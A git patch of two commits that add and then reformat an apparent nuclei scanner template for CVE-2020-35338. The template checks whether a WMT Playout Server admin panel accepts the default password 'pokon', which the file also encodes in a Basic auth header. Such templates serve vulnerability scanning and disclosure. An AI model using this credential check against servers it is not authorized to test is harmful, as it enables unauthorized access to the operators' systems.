From 5b598fb2910ba440eb470441ad0883ee73689e18 Mon Sep 17 00:00:00 2001 From: jeyaseelan8 <45196752+jeyaseelan8@users.noreply.github.com> Date: Wed, 21 Apr 2021 21:05:47 +0530 Subject: [PATCH 1/2] Add files via upload --- cves/2020/CVE-2020-35338.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2020/CVE-2020-35338.yaml diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml new file mode 100644 index 0000000000..59948f37d2 --- /dev/null +++ b/cves/2020/CVE-2020-35338.yaml @@ -0,0 +1,27 @@ +id: CVE-2020-35338 +info: + author: "Jeya Seelan" + description: "Default Credentials to Unauthorised Remote Access of Internal Panel of WMT Server" + name: "Default Credentials of WMT Server" + reference: + - "https://nvd.nist.gov/vuln/detail/CVE-2020-35338" + - "https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa" + severity: critical + tags: "cve,cve2020,wmt,defaultcredentials" +requests: + - method: GET + path: + - "{{BaseURL}}/server/" + headers: + Authorization: "Basic OnBva29u" + matchers: + - + part: body + type: word + words: + - "WMT Server playout" + - + status: + - 200 + type: status + From 0e2a270a11efb86c409b723bf17cdcc6b6dea7b8 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 21 Apr 2021 22:08:46 +0530 Subject: [PATCH 2/2] minor update --- cves/2020/CVE-2020-35338.yaml | 31 ++++++++++++++++--------------- 1 file changed, 16 insertions(+), 15 deletions(-) diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml index 59948f37d2..2470e2c195 100644 --- a/cves/2020/CVE-2020-35338.yaml +++ b/cves/2020/CVE-2020-35338.yaml @@ -1,27 +1,28 @@ id: CVE-2020-35338 + info: - author: "Jeya Seelan" - description: "Default Credentials to Unauthorised Remote Access of Internal Panel of WMT Server" - name: "Default Credentials of WMT Server" - reference: - - "https://nvd.nist.gov/vuln/detail/CVE-2020-35338" - - "https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa" + author: Jeya Seelan severity: critical - tags: "cve,cve2020,wmt,defaultcredentials" + name: Default Credentials of WMT Server + description: The Web Administrative Interface in Mobile Viewpoint Wireless Multiplex Terminal (WMT) Playout Server 20.2.8 and earlier has a default account with a password of pokon. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-35338 + - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa + tags: cve,cve2020,wmt,default-login + requests: - method: GET path: - "{{BaseURL}}/server/" headers: Authorization: "Basic OnBva29u" + + matchers-condition: and matchers: - - - part: body - type: word - words: - - "<title>WMT Server playout" - - + - type: status status: - 200 - type: status - + + - type: word + words: + - "<title>WMT Server playout" \ No newline at end of file